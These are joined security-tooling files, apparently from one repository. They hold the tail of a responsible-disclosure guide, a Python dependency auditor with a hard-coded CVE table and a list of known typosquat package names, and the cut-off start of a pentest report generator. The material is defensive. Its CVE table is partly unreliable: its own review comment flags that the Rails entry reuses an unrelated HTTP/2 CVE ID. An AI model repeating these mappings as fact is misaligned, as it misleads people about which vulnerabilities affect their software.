+ +I remain available to provide additional details or clarification. + +Best regards, +[Your Name] +``` + +### Status Update Request (Day 30) + +``` +Subject: Re: Security Vulnerability Report — [Brief Title] (30-Day Update Request) + +Dear Security Team, + +It has been 30 days since I reported the [vulnerability type] in [component]. I would appreciate an update on: + +1. Has the vulnerability been confirmed? +2. What is the remediation timeline? +3. Is there anything I can do to assist? + +As noted in my original report, I follow a 90-day disclosure policy. The current disclosure date is [DATE]. + +Best regards, +[Your Name] +``` + +### Pre-Disclosure Notification (Day 80) + +``` +Subject: Re: Security Vulnerability Report — [Brief Title] (Pre-Disclosure Notice) + +Dear Security Team, + +This is a courtesy notice that the 90-day disclosure window for [vulnerability] will close on [DATE]. + +Current status as I understand it: [summarize last known status]. + +If a fix is not yet available, I recommend: +- Publishing a security advisory acknowledging the issue +- Providing mitigation guidance to affected users +- Communicating a realistic remediation timeline + +I am willing to: +- Extend the deadline by [X] days if you can provide a concrete remediation date +- Review the patch before public release +- Coordinate joint disclosure + +Please respond by [DATE - 5 days] so we can align on the disclosure approach. + +Best regards, +[Your Name] +``` + +### Public Disclosure Statement + +``` +# Security Advisory: [Title] + +**Reported:** [Date] +**Disclosed:** [Date] +**Vendor:** [Vendor Name] +**Status:** [Fixed in version X.Y.Z / Unpatched / Mitigated] + +## Summary +[Brief description accessible to non-technical readers.] + +## Technical Details +[Full technical description, reproduction steps, evidence.] + +## Impact +[What could be exploited and the blast radius.] 
+ +## Timeline +| Date | Event | +|------|-------| +| [Date] | Vulnerability discovered | +| [Date] | Report submitted to vendor | +| [Date] | Vendor acknowledged | +| [Date] | Fix released (version X.Y.Z) | +| [Date] | Public disclosure | + +## Remediation +[Steps users should take — update to version X, apply config change, etc.] + +## Credit +Discovered by [Your Name] ([Organization]). +``` + +--- + +## Legal Considerations + +### Before You Test + +1. **Written authorization is required.** For external testing, obtain a signed rules-of-engagement document or scope-of-work. For bug bounty programs, the program's terms of service serve as authorization. + +2. **Understand local laws.** The Computer Fraud and Abuse Act (CFAA) in the US, the Computer Misuse Act in the UK, and equivalent laws in other jurisdictions criminalize unauthorized access. Authorization is your legal shield. + +3. **Stay within scope.** If the bug bounty program says "*.example.com only," do not test anything outside that scope. If your pen test contract covers the web application, do not pivot to internal networks. + +4. **Document everything.** Keep timestamped records of all testing activities: what you tested, when, what you found, and what you did not do (e.g., "did not access real user data"). + +### During Testing + +1. **Do not access real user data.** Use your own test accounts. If you accidentally access real data, stop immediately, document the incident, and report it to the vendor. + +2. **Do not cause damage.** No data destruction, no denial-of-service, no resource exhaustion. If a test might cause disruption, get explicit approval first. + +3. **Do not exfiltrate data.** Demonstrate the vulnerability with minimal proof. A screenshot showing "1000 records returned" is sufficient — downloading the records is not. + +4. **Do not install backdoors.** Even for "maintaining access during testing." If you need persistent access, work with the vendor's team. 
+ +### During Disclosure + +1. **Do not threaten.** Disclosure timelines are industry practice, not ultimatums. Communicate professionally. + +2. **Do not sell vulnerability details.** Selling to exploit brokers instead of reporting to the vendor is irresponsible and may be illegal. + +3. **Give vendors reasonable time.** 90 days is standard. Complex architectural fixes may need more time if the vendor is communicating and making progress. + +4. **Do not publicly disclose details that help attackers exploit unpatched systems.** If the fix is not yet deployed, disclose the existence and severity of the issue without full exploitation details. + +--- + +## Bug Bounty Program Integration + +### Finding the Right Program + +1. **Check the vendor's website:** Look for `/security`, `/.well-known/security.txt`, or a security page +2. **Bug bounty platforms:** HackerOne, Bugcrowd, Intigriti, YesWeHack +3. **No program?** Report to `security@[vendor].com` or use CERT/CC as an intermediary + +### Bug Bounty Best Practices + +1. **Read the entire policy** before testing — scope, exclusions, safe harbor +2. **Test only in-scope assets** — out-of-scope findings may not be rewarded and could be legally risky +3. **Report one vulnerability per submission** — do not bundle unrelated issues +4. **Provide clear reproduction steps** — assume the reader cannot read your mind +5. **Do not duplicate** — search existing reports before submitting +6. **Be patient** — triage can take days to weeks depending on program volume +7. **Do not publicly disclose** until the program explicitly permits it + +### If No Bug Bounty Exists + +1. Report directly to `security@[vendor].com` +2. If no response after 14 days, try CERT/CC (https://www.kb.cert.org/vuls/report/) +3. Follow the standard disclosure timeline +4. 
Do not expect payment — responsible disclosure is an ethical practice, not a paid service + +--- + +## CVE Request Process + +### When to Request a CVE + +- The vulnerability affects publicly available software +- The vendor has confirmed the issue +- A fix is available or will be available soon + +### How to Request + +1. **Through the vendor:** If the vendor is a CNA (CVE Numbering Authority), they will assign the CVE +2. **Through MITRE:** If the vendor is not a CNA, submit a request at https://cveform.mitre.org/ +3. **Through a CNA:** Some platforms (HackerOne, GitHub) are CNAs and can assign CVEs for vulnerabilities in their scope + +### Information Required + +``` +- Vulnerability type (CWE ID if known) +- Affected product and version range +- Fixed version (if available) +- Attack vector (network, local, physical) +- Impact (confidentiality, integrity, availability) +- CVSS score and vector string +- Description (one paragraph, technical but readable) +- References (advisory URL, patch commit, bug report) +``` + +### CVE ID Format + +``` +CVE-YYYY-NNNN (the sequence number has four or more digits) +Example: CVE-2024-12345 +``` + +After assignment, the CVE will be published in the NVD (National Vulnerability Database) at https://nvd.nist.gov/. + +--- + +## Key Principles Summary + +1. **Report first, disclose later.** Always give the vendor a chance to fix the issue before going public. +2. **Minimize impact.** Prove the vulnerability exists without causing damage or accessing real data. +3. **Communicate professionally.** Security is stressful for everyone. Be clear, helpful, and patient. +4. **Document everything.** Timestamps, evidence, communications — protect yourself and the process. +5. **Follow through.** A report without follow-up helps no one. Stay engaged until the issue is resolved. +6. **Credit where due.** Acknowledge the vendor's response (positive or negative) in your disclosure. +7. **Know the law.** Authorization and scope are your legal foundations. Never test without them.
#!/usr/bin/env python3
"""
Dependency Auditor - Analyze package manifests for known vulnerable patterns.

Table of Contents:
    DependencyAuditor - Main class for dependency vulnerability analysis
        __init__                 - Initialize with manifest path and severity filter
        audit()                  - Run full audit on the manifest
        _parse_manifest()        - Detect and parse the manifest file
        _parse_package_json()    - Parse npm package.json
        _parse_requirements()    - Parse pip requirements.txt
        _parse_go_mod()          - Parse Go go.mod
        _parse_gemfile()         - Parse Ruby Gemfile / Gemfile.lock
        _check_vulnerabilities() - Check packages against known CVE patterns
        _check_risky_patterns()  - Detect risky dependency patterns
    main() - CLI entry point

Usage:
    python dependency_auditor.py --file package.json
    python dependency_auditor.py --file requirements.txt --severity high
    python dependency_auditor.py --file go.mod --json
"""

import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional, Tuple


@dataclass
class Dependency:
    """Represents a parsed dependency."""
    name: str
    version: str
    ecosystem: str  # npm, pypi, go, rubygems
    is_dev: bool = False


@dataclass
class VulnerabilityFinding:
    """A known vulnerability match for a dependency."""
    package: str
    installed_version: str
    vulnerable_range: str
    cve_id: str
    severity: str  # critical, high, medium, low
    title: str
    description: str
    remediation: str
    cvss_score: float = 0.0
    references: List[str] = field(default_factory=list)


@dataclass
class RiskyPattern:
    """A risky dependency pattern (not a CVE, but a concern)."""
    package: str
    pattern_type: str  # pinning, wildcard, deprecated, typosquat
    severity: str
    description: str
    recommendation: str


class DependencyAuditor:
    """Analyze package manifests for known vulnerable patterns and risky dependencies.

    The vulnerability data is the small static table below (``KNOWN_VULNS``);
    this class performs no network lookups.
    """

    # Known vulnerable package versions (curated subset of high-profile CVEs)
    KNOWN_VULNS = [
        {"ecosystem": "npm", "package": "lodash", "below": "4.17.21",
         "cve": "CVE-2021-23337", "severity": "high", "cvss": 7.2,
         # Title aligned with the description below (command injection via template).
         "title": "Command Injection in lodash",
         "description": "lodash before 4.17.21 is vulnerable to Command Injection via template function.",
         "remediation": "Upgrade lodash to >=4.17.21"},
        {"ecosystem": "npm", "package": "axios", "below": "1.6.0",
         "cve": "CVE-2023-45857", "severity": "medium", "cvss": 6.5,
         "title": "CSRF token exposure in axios",
         "description": "axios before 1.6.0 inadvertently exposes CSRF tokens in cross-site requests.",
         "remediation": "Upgrade axios to >=1.6.0"},
        {"ecosystem": "npm", "package": "express", "below": "4.19.2",
         "cve": "CVE-2024-29041", "severity": "medium", "cvss": 6.1,
         "title": "Open Redirect in express",
         "description": "express before 4.19.2 allows open redirects via malicious URLs.",
         "remediation": "Upgrade express to >=4.19.2"},
        {"ecosystem": "npm", "package": "jsonwebtoken", "below": "9.0.0",
         "cve": "CVE-2022-23529", "severity": "critical", "cvss": 9.8,
         "title": "Insecure key retrieval in jsonwebtoken",
         "description": "jsonwebtoken before 9.0.0 allows key confusion attacks via secretOrPublicKey.",
         "remediation": "Upgrade jsonwebtoken to >=9.0.0"},
        {"ecosystem": "npm", "package": "minimatch", "below": "3.0.5",
         "cve": "CVE-2022-3517", "severity": "high", "cvss": 7.5,
         "title": "ReDoS in minimatch",
         "description": "minimatch before 3.0.5 is vulnerable to Regular Expression Denial of Service.",
         "remediation": "Upgrade minimatch to >=3.0.5"},
        {"ecosystem": "npm", "package": "tar", "below": "6.1.9",
         "cve": "CVE-2021-37713", "severity": "high", "cvss": 8.6,
         "title": "Arbitrary File Creation in tar",
         "description": "tar before 6.1.9 allows arbitrary file creation/overwrite via symlinks.",
         "remediation": "Upgrade tar to >=6.1.9"},
        {"ecosystem": "pypi", "package": "pillow", "below": "9.3.0",
         "cve": "CVE-2022-45198", "severity": "high", "cvss": 7.5,
         "title": "DoS via crafted image in Pillow",
         "description": "Pillow before 9.3.0 allows denial of service via specially crafted image files.",
         "remediation": "Upgrade Pillow to >=9.3.0"},
        {"ecosystem": "pypi", "package": "django", "below": "4.2.8",
         "cve": "CVE-2023-46695", "severity": "high", "cvss": 7.5,
         "title": "DoS via file uploads in Django",
         "description": "Django before 4.2.8 allows denial of service via large file uploads.",
         "remediation": "Upgrade Django to >=4.2.8"},
        {"ecosystem": "pypi", "package": "flask", "below": "2.3.2",
         "cve": "CVE-2023-30861", "severity": "high", "cvss": 7.5,
         "title": "Session cookie exposure in Flask",
         "description": "Flask before 2.3.2 may expose session cookies on cross-origin redirects.",
         "remediation": "Upgrade Flask to >=2.3.2"},
        {"ecosystem": "pypi", "package": "requests", "below": "2.31.0",
         "cve": "CVE-2023-32681", "severity": "medium", "cvss": 6.1,
         "title": "Proxy-Authorization header leak in requests",
         "description": "requests before 2.31.0 leaks Proxy-Authorization headers on redirects.",
         "remediation": "Upgrade requests to >=2.31.0"},
        {"ecosystem": "pypi", "package": "cryptography", "below": "41.0.0",
         "cve": "CVE-2023-38325", "severity": "high", "cvss": 7.5,
         "title": "NULL dereference in cryptography",
         "description": "cryptography before 41.0.0 has a NULL pointer dereference in PKCS7 parsing.",
         "remediation": "Upgrade cryptography to >=41.0.0"},
        {"ecosystem": "pypi", "package": "pyyaml", "below": "6.0.1",
         "cve": "CVE-2020-14343", "severity": "critical", "cvss": 9.8,
         "title": "Arbitrary code execution in PyYAML",
         "description": "PyYAML before 6.0.1 allows arbitrary code execution via yaml.load().",
         "remediation": "Upgrade PyYAML to >=6.0.1 and use yaml.safe_load()"},
        {"ecosystem": "go", "package": "golang.org/x/crypto", "below": "0.17.0",
         "cve": "CVE-2023-48795", "severity": "medium", "cvss": 5.9,
         "title": "Terrapin SSH prefix truncation attack",
         "description": "golang.org/x/crypto before 0.17.0 vulnerable to SSH prefix truncation.",
         "remediation": "Upgrade golang.org/x/crypto to >=0.17.0"},
        {"ecosystem": "go", "package": "golang.org/x/net", "below": "0.17.0",
         "cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
         "title": "HTTP/2 rapid reset DoS",
         "description": "golang.org/x/net before 0.17.0 vulnerable to HTTP/2 rapid reset attack.",
         "remediation": "Upgrade golang.org/x/net to >=0.17.0"},
        # NOTE(review): this entry reuses the CVE ID of the golang.org/x/net
        # HTTP/2 rapid reset entry above while describing a Rails ReDoS.
        # The ID and threshold look copy-pasted; verify against the Rails
        # security advisories before relying on this finding.
        {"ecosystem": "rubygems", "package": "rails", "below": "7.0.8",
         "cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
         "title": "ReDoS in Rails",
         "description": "Rails before 7.0.8 vulnerable to Regular Expression Denial of Service.",
         "remediation": "Upgrade rails to >=7.0.8"},
    ]

    # Known typosquat / malicious package names
    TYPOSQUAT_PACKAGES = {
        "npm": ["crossenv", "event-stream-malicious", "flatmap-stream", "ua-parser-jss",
                "loadsh", "lodashs", "axois", "requets"],
        "pypi": ["python3-dateutil", "jeIlyfish", "python-binance-sdk", "requestss",
                 "djago", "flassk", "requets"],
    }

    # First run of dot-separated integers in a version spec, e.g. "4.17.0" in ">=4.17.0 <5.0.0".
    _VERSION_TOKEN_RE = re.compile(r"[0-9]+(?:\.[0-9]+)*")
    # requirements.txt entry: name, optional [extras], optional comparison operator, version digits.
    _REQUIREMENT_RE = re.compile(
        r"^([a-zA-Z0-9_.-]+)\s*(?:\[[^\]]*\])?\s*(?:[=<>!~]+\s*)?([\d.]*)"
    )
    # Gemfile entry: gem 'name'[, 'constraint'].
    _GEM_RE = re.compile(r'''gem\s+['"]([\w-]+)['"](?:\s*,\s*['"]([^'"]*)['"])?''')
    # Gemfile.lock resolved spec: "name (1.2.3)". Constraint lines such as
    # "name (= 1.2.3)" start with an operator and therefore do not match.
    _GEM_LOCK_RE = re.compile(r"^([\w.-]+) \(([0-9][^\s)]*)\)$")

    def __init__(self, manifest_path: str, severity_filter: str = "low"):
        """Store the manifest location and the minimum severity to report.

        Args:
            manifest_path: Path to the manifest file; it is read in ``audit()``.
            severity_filter: One of "critical", "high", "medium", "low".
                Unrecognised values fall back to the "low" threshold.
        """
        self.manifest_path = Path(manifest_path)
        self.severity_filter = severity_filter
        self.severity_order = {"critical": 4, "high": 3, "medium": 2, "low": 1}
        self.min_severity = self.severity_order.get(severity_filter, 1)

    def audit(self) -> Dict:
        """Run full audit on the manifest file.

        Returns:
            A dict with the manifest path, detected ecosystem, dependency
            counts, the (severity-filtered) vulnerability findings and risky
            patterns as dataclass instances, and a per-severity summary.
        """
        deps = self._parse_manifest()
        vuln_findings = self._check_vulnerabilities(deps)
        risky_patterns = self._check_risky_patterns(deps)

        # Filter by severity
        vuln_findings = [f for f in vuln_findings
                         if self.severity_order.get(f.severity, 0) >= self.min_severity]
        risky_patterns = [r for r in risky_patterns
                          if self.severity_order.get(r.severity, 0) >= self.min_severity]

        def count(level: str) -> int:
            return sum(1 for f in vuln_findings if f.severity == level)

        return {
            "manifest": str(self.manifest_path),
            "ecosystem": deps[0].ecosystem if deps else "unknown",
            "total_dependencies": len(deps),
            "dev_dependencies": sum(1 for d in deps if d.is_dev),
            "vulnerability_findings": vuln_findings,
            "risky_patterns": risky_patterns,
            "summary": {
                "critical": count("critical"),
                "high": count("high"),
                "medium": count("medium"),
                "low": count("low"),
                "risky_patterns_count": len(risky_patterns),
            }
        }

    def _parse_manifest(self) -> List[Dependency]:
        """Detect manifest type from the file name and parse dependencies.

        Exits the process with status 1 if the file cannot be read or the
        file name is not a supported manifest.
        """
        name = self.manifest_path.name.lower()
        try:
            content = self.manifest_path.read_text(encoding="utf-8")
        except (OSError, PermissionError) as e:
            print(f"Error reading {self.manifest_path}: {e}", file=sys.stderr)
            sys.exit(1)

        if name == "package.json":
            return self._parse_package_json(content)
        elif name in ("requirements.txt", "requirements-dev.txt", "requirements_dev.txt"):
            return self._parse_requirements(content)
        elif name == "go.mod":
            return self._parse_go_mod(content)
        elif name in ("gemfile", "gemfile.lock"):
            return self._parse_gemfile(content)
        else:
            print(f"Unsupported manifest type: {name}", file=sys.stderr)
            print("Supported: package.json, requirements.txt, go.mod, Gemfile", file=sys.stderr)
            sys.exit(1)

    def _parse_package_json(self, content: str) -> List[Dependency]:
        """Parse npm package.json.

        The version recorded for each dependency is the first numeric version
        token in its spec ("^4.17.20" -> "4.17.20", ">=1.2.0 <2.0.0" ->
        "1.2.0"). Specs without any digits ("*", "latest", "workspace:*") are
        kept verbatim so the unpinned-version check can see them.
        """
        try:
            data = json.loads(content)
        except json.JSONDecodeError as e:
            print(f"Invalid JSON in package.json: {e}", file=sys.stderr)
            sys.exit(1)
        if not isinstance(data, dict):
            print("Invalid JSON in package.json: top-level value must be an object", file=sys.stderr)
            sys.exit(1)

        deps = []
        for section, is_dev in (("dependencies", False), ("devDependencies", True)):
            entries = data.get(section) or {}
            if not isinstance(entries, dict):
                continue  # malformed section; nothing usable to parse
            for name, spec in entries.items():
                spec = spec if isinstance(spec, str) else str(spec)
                token = self._VERSION_TOKEN_RE.search(spec)
                version = token.group(0) if token else spec
                deps.append(Dependency(name=name, version=version, ecosystem="npm", is_dev=is_dev))
        return deps

    def _parse_requirements(self, content: str) -> List[Dependency]:
        """Parse pip requirements.txt.

        Blank lines, comments and option lines (starting with "-") are
        skipped. Extras such as ``requests[security]==2.30.0`` are tolerated.
        Entries without a version are recorded with version "unknown".
        """
        deps = []
        for raw in content.splitlines():
            line = raw.strip()
            if not line or line.startswith("#") or line.startswith("-"):
                continue
            match = self._REQUIREMENT_RE.match(line)
            if match:
                # "1.0.*" is captured as "1.0."; drop the dangling dot.
                version = match.group(2).strip(".") or "unknown"
                deps.append(Dependency(name=match.group(1).lower(), version=version, ecosystem="pypi"))
        return deps

    def _parse_go_mod(self, content: str) -> List[Dependency]:
        """Parse Go go.mod.

        Handles both ``require ( ... )`` blocks and single-line ``require``
        directives. Modules marked ``// indirect`` are recorded with
        ``is_dev=True``.
        """
        deps = []
        in_require = False
        for raw in content.splitlines():
            line = raw.strip()
            if line.startswith("require ("):
                in_require = True
                continue
            if line == ")":
                in_require = False
                continue
            if line.startswith("//"):
                continue  # a comment-only line is not a module requirement
            if in_require or line.startswith("require "):
                parts = line.replace("require ", "").split()
                if len(parts) >= 2:
                    deps.append(Dependency(
                        name=parts[0],
                        version=parts[1].lstrip("v"),
                        ecosystem="go",
                        is_dev="// indirect" in line,
                    ))
        return deps

    def _parse_gemfile(self, content: str) -> List[Dependency]:
        """Parse Ruby Gemfile or Gemfile.lock content.

        Gemfile ``gem 'name', 'constraint'`` lines yield the constraint with
        its operators stripped ("~> 7.0.4" -> "7.0.4"), or "unknown" when no
        constraint is given. Gemfile.lock resolved specs ("name (1.2.3)")
        yield the exact locked version.
        """
        deps = []
        for raw in content.splitlines():
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            gem = self._GEM_RE.match(line)
            if gem:
                version = re.sub(r"[~><=\s]", "", gem.group(2) or "unknown")
                deps.append(Dependency(name=gem.group(1), version=version, ecosystem="rubygems"))
                continue
            locked = self._GEM_LOCK_RE.match(line)
            if locked:
                deps.append(Dependency(name=locked.group(1), version=locked.group(2), ecosystem="rubygems"))
        return deps

    @staticmethod
    def _version_below(installed: str, threshold: str) -> bool:
        """Check if installed version is below threshold (simple numeric comparison).

        Only the leading dot-separated integers are compared; parsing stops at
        the first segment carrying a non-numeric suffix ("1.2.3-rc1" ->
        [1, 2, 3]). The shorter version is zero-padded.

        Returns:
            True if ``installed`` is numerically lower than ``threshold``.
            False if either version has no numeric prefix ("unknown", "*",
            "latest"), because an unknown version must not be reported as a
            confirmed vulnerable one.
        """
        def numeric_parts(version: str) -> List[int]:
            parts: List[int] = []
            for segment in version.split("."):
                digits = re.match(r"[0-9]+", segment)
                if digits is None:
                    break
                parts.append(int(digits.group()))
                if digits.end() != len(segment):
                    break  # suffix such as "-rc1": nothing comparable follows
            return parts

        inst_parts = numeric_parts(installed)
        thresh_parts = numeric_parts(threshold)
        if not inst_parts or not thresh_parts:
            return False
        # Pad shorter list
        width = max(len(inst_parts), len(thresh_parts))
        inst_parts.extend([0] * (width - len(inst_parts)))
        thresh_parts.extend([0] * (width - len(thresh_parts)))
        return inst_parts < thresh_parts

    def _check_vulnerabilities(self, deps: List[Dependency]) -> List[VulnerabilityFinding]:
        """Check dependencies against the ``KNOWN_VULNS`` table.

        A dependency matches when ecosystem and (case-insensitive) name are
        equal and its version is below the entry's ``below`` threshold.
        """
        findings = []
        for dep in deps:
            for vuln in self.KNOWN_VULNS:
                if (dep.ecosystem == vuln["ecosystem"] and
                        dep.name.lower() == vuln["package"].lower() and
                        self._version_below(dep.version, vuln["below"])):
                    findings.append(VulnerabilityFinding(
                        package=dep.name,
                        installed_version=dep.version,
                        vulnerable_range=f"< {vuln['below']}",
                        cve_id=vuln["cve"],
                        severity=vuln["severity"],
                        title=vuln["title"],
                        description=vuln["description"],
                        remediation=vuln["remediation"],
                        cvss_score=vuln.get("cvss", 0.0),
                        references=[f"https://nvd.nist.gov/vuln/detail/{vuln['cve']}"],
                    ))
        return findings

    def _check_risky_patterns(self, deps: List[Dependency]) -> List[RiskyPattern]:
        """Detect risky dependency patterns.

        Reports known typosquat names, unpinned versions, and a project-level
        warning when more than 70% of dependencies are dev-only.
        """
        patterns = []
        ecosystem = deps[0].ecosystem if deps else "unknown"

        # Check for typosquat packages (lowercased once, not once per dependency)
        typosquats = {t.lower() for t in self.TYPOSQUAT_PACKAGES.get(ecosystem, [])}
        for dep in deps:
            if dep.name.lower() in typosquats:
                patterns.append(RiskyPattern(
                    package=dep.name,
                    pattern_type="typosquat",
                    severity="critical",
                    description=f"'{dep.name}' is a known typosquat or malicious package name.",
                    recommendation="Remove immediately and check for compromised data. Install the legitimate package.",
                ))

        # Check for wildcard/unpinned versions
        for dep in deps:
            if dep.version in ("*", "latest", "unknown", ""):
                patterns.append(RiskyPattern(
                    package=dep.name,
                    pattern_type="unpinned",
                    severity="medium",
                    description=f"'{dep.name}' has an unpinned version ({dep.version}).",
                    recommendation="Pin to a specific version to prevent supply chain attacks.",
                ))

        # Check for excessive dev dependencies in production
        dev_count = sum(1 for d in deps if d.is_dev)
        total = len(deps)
        if total > 0 and dev_count / total > 0.7:
            patterns.append(RiskyPattern(
                package="(project-level)",
                pattern_type="dev-heavy",
                severity="low",
                description=f"{dev_count}/{total} dependencies are dev-only. Large dev surface increases supply chain risk.",
                recommendation="Review dev dependencies. Remove unused ones. Consider using --production for installs.",
            ))

        return patterns


def format_report_text(result: Dict) -> str:
    """Format audit result as human-readable text.

    Args:
        result: The dict returned by ``DependencyAuditor.audit()``.

    Returns:
        The full report as a single newline-joined string.
    """
    lines = []
    lines.append("=" * 70)
    lines.append("DEPENDENCY VULNERABILITY AUDIT REPORT")
    lines.append(f"Manifest: {result['manifest']}")
    lines.append(f"Ecosystem: {result['ecosystem']}")
    lines.append(f"Total dependencies: {result['total_dependencies']} ({result['dev_dependencies']} dev)")
    lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    lines.append("=" * 70)

    summary = result["summary"]
    lines.append(f"\nSummary: {summary['critical']} critical, {summary['high']} high, "
                 f"{summary['medium']} medium, {summary['low']} low, "
                 f"{summary['risky_patterns_count']} risky pattern(s)")

    vulns = result["vulnerability_findings"]
    if vulns:
        lines.append(f"\n--- VULNERABILITY FINDINGS ({len(vulns)}) ---\n")
        for v in vulns:
            lines.append(f"  [{v.severity.upper()}] {v.package} {v.installed_version}")
            lines.append(f"    CVE: {v.cve_id} (CVSS: {v.cvss_score})")
            lines.append(f"    {v.title}")
            lines.append(f"    Vulnerable: {v.vulnerable_range}")
            lines.append(f"    Fix: {v.remediation}")
            lines.append("")
    else:
        lines.append("\nNo known vulnerabilities found in dependencies.")

    risky = result["risky_patterns"]
    if risky:
        lines.append(f"\n--- RISKY PATTERNS ({len(risky)}) ---\n")
        for r in risky:
            lines.append(f"  [{r.severity.upper()}] {r.package} — {r.pattern_type}")
            lines.append(f"    {r.description}")
            lines.append(f"    Fix: {r.recommendation}")
            lines.append("")

    return "\n".join(lines)


def main():
    """CLI entry point: audit one manifest and print a text or JSON report.

    Exits with status 1 when the manifest is missing or when any critical or
    high severity vulnerability is reported, so the script can gate CI.
    """
    parser = argparse.ArgumentParser(
        description="Dependency Auditor — Analyze package manifests for known vulnerabilities and risky patterns.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Supported manifests:
  package.json       (npm)
  requirements.txt   (pip/PyPI)
  go.mod             (Go)
  Gemfile            (Ruby)

Examples:
  %(prog)s --file package.json
  %(prog)s --file requirements.txt --severity high
  %(prog)s --file go.mod --json
        """,
    )
    parser.add_argument("--file", required=True, metavar="PATH",
                        help="Path to package manifest file")
    parser.add_argument("--severity", choices=["low", "medium", "high", "critical"], default="low",
                        help="Minimum severity to report (default: low)")
    parser.add_argument("--json", action="store_true", dest="json_output",
                        help="Output results as JSON")
    args = parser.parse_args()

    if not Path(args.file).exists():
        print(f"Error: File not found: {args.file}", file=sys.stderr)
        sys.exit(1)

    auditor = DependencyAuditor(manifest_path=args.file, severity_filter=args.severity)
    result = auditor.audit()

    if args.json_output:
        # Findings are dataclass instances; convert them for JSON serialisation.
        json_result = {
            "manifest": result["manifest"],
            "ecosystem": result["ecosystem"],
            "total_dependencies": result["total_dependencies"],
            "dev_dependencies": result["dev_dependencies"],
            "summary": result["summary"],
            "vulnerability_findings": [asdict(f) for f in result["vulnerability_findings"]],
            "risky_patterns": [asdict(r) for r in result["risky_patterns"]],
            "generated_at": datetime.now().isoformat(),
        }
        print(json.dumps(json_result, indent=2))
    else:
        print(format_report_text(result))

    # Exit non-zero if critical or high vulnerabilities found
    if result["summary"]["critical"] > 0 or result["summary"]["high"] > 0:
        sys.exit(1)


if __name__ == "__main__":
    main()
impact remediation matrix + _calculate_risk_score() - Calculate overall risk score + main() - CLI entry point + +Usage: + python pentest_report_generator.py --findings findings.json --format md --output report.md + python pentest_report_generator.py --findings findings.json --format json + python pentest_report_generator.py --findings findings.json --format md +""" + +import argparse +import json +import sys +from dataclasses import dataclass, asdict, field +from datetime import datetime +from pathlib import Path +from typing import Dict, List, Optional + + +@dataclass +class Finding: + """A single pen test finding.""" + title: str + severity: str # critical, high, medium, low, info + cvss_score: float + category: str + description: str + evidence: str + impact: str + remediation: str + cvss_vector: str = "" + references: List[str] = field(default_factory=list) + effort: str = "medium" # low, medium, high — remediation effort + + +SEVERITY_ORDER = {"critical": 5, "high": 4, "medium": 3, "low": 2, "info": 1} + + +class PentestReportGenerator: + """Generate professional penetration testing reports from structured findings.""" + + def __init__(self, findings: List[Finding], metadata: Optional[Dict] = None): + self.findings = sorted(findings, key=lambda f: SEVERITY_ORDER.get(f.severity, 0), reverse=True) + self.metadata = metadata or {} + self.generated_at = datetime.now().strftime("%Y-%m-%d %H:%M:%S") + + def generate_markdown(self) -> str: + """Generate a complete markdown pen test report.""" + sections = [] + sections.append(self._header()) + sections.append(self._executive_summary()) + sections.append(self._scope_section()) + sections.append(self._findings_table()) + sections.append(self._detailed_findings()) + sections.append(self._remediation_matrix()) + sections.append(self._methodology_section()) + sections.append(self._appendix()) + return "\n\n".join(sections) + + def generate_json(self) -> Dict: + """Generate structured JSON report.""" + return { + 
"report_metadata": { + "title": self.metadata.get("title", "Penetration Test Report"), + "target": self.metadata.get("target", "Not specified"), + "tester": self.metadata.get("tester", "Not specified"), + "date_range": self.metadata.get("date_range", "Not specified"), + "generated_at": self.generated_at, + "overall_risk_score": self._calculate_risk_score(), + "overall_risk_level": self._risk_level(), + }, + "summary": { + "total_findings": len(self.findings), + "critical": len([f for f in self.findings if f.severity == "critical"]), + "high": len([f for f in self.findings if f.severity == "high"]), + "medium": len([f for f in self.findings if f.severity == "medium"]), + "low": len([f for f in self.findings if f.severity == "low"]), + "info": len([f for f in self.findings if f.severity == "info"]), + }, + "findings": [asdict(f) for f in self.findings], + "remediation_priority": self._remediation_priority_list(), + } + + def _header(self) -> str: + title = self.metadata.get("title", "Penetration Test Report") + target = self.metadata.get("target", "Not specified") + tester = self.metadata.get("tester", "Not specified") + date_range = self.metadata.get("date_range", "Not specified") + lines = [ + f"# {title}", + "", + "| Field | Value |", + "|-------|-------|", + f"| **Target** | {target} |", + f"| **Tester** | {tester} |", + f"| **Date Range** | {date_range} |", + f"| **Report Generated** | {self.generated_at} |", + f"| **Overall Risk** | {self._risk_level()} (Score: {self._calculate_risk_score():.1f}/10) |", + f"| **Total Findings** | {len(self.findings)} |", + ] + return "\n".join(lines) + + def _executive_summary(self) -> str: + critical = len([f for f in self.findings if f.severity == "critical"]) + high = len([f for f in self.findings if f.severity == "high"]) + medium = len([f for f in self.findings if f.severity == "medium"]) + low = len([f for f in self.findings if f.severity == "low"]) + info = len([f for f in self.findings if f.severity == "info"]) + 
risk_score = self._calculate_risk_score() + risk_level = self._risk_level() + + lines = [ + "## Executive Summary", + "", + f"This penetration test identified **{len(self.findings)} findings** across the target application. " + f"The overall risk level is **{risk_level}** with a score of **{risk_score:.1f}/10**.", + "", + "### Finding Severity Distribution", + "", + "| Severity | Count |", + "|----------|-------|", + f"| Critical | {critical} |", + f"| High | {high} |", + f"| Medium | {medium} |", + f"| Low | {low} |", + f"| Informational | {info} |", + ] + + # Top 3 findings + if self.findings: + lines.append("") + lines.append("### Top Priority Findings") + lines.append("") + for i, f in enumerate(self.findings[:3], 1): + lines.append(f"{i}. **{f.title}** ({f.severity.upper()}, CVSS {f.cvss_score}) — {f.impact[:120]}") + + # Risk assessment + lines.append("") + if critical > 0: + lines.append("> **CRITICAL RISK**: Immediate remediation required. Critical vulnerabilities " + "allow attackers to compromise the system with minimal effort.") + elif high > 0: + lines.append("> **HIGH RISK**: Prompt remediation recommended. High-severity vulnerabilities " + "pose significant risk of exploitation.") + elif medium > 0: + lines.append("> **MODERATE RISK**: Remediation should be planned within the next sprint. " + "Medium findings may be chained for greater impact.") + else: + lines.append("> **LOW RISK**: The application has a reasonable security posture. 
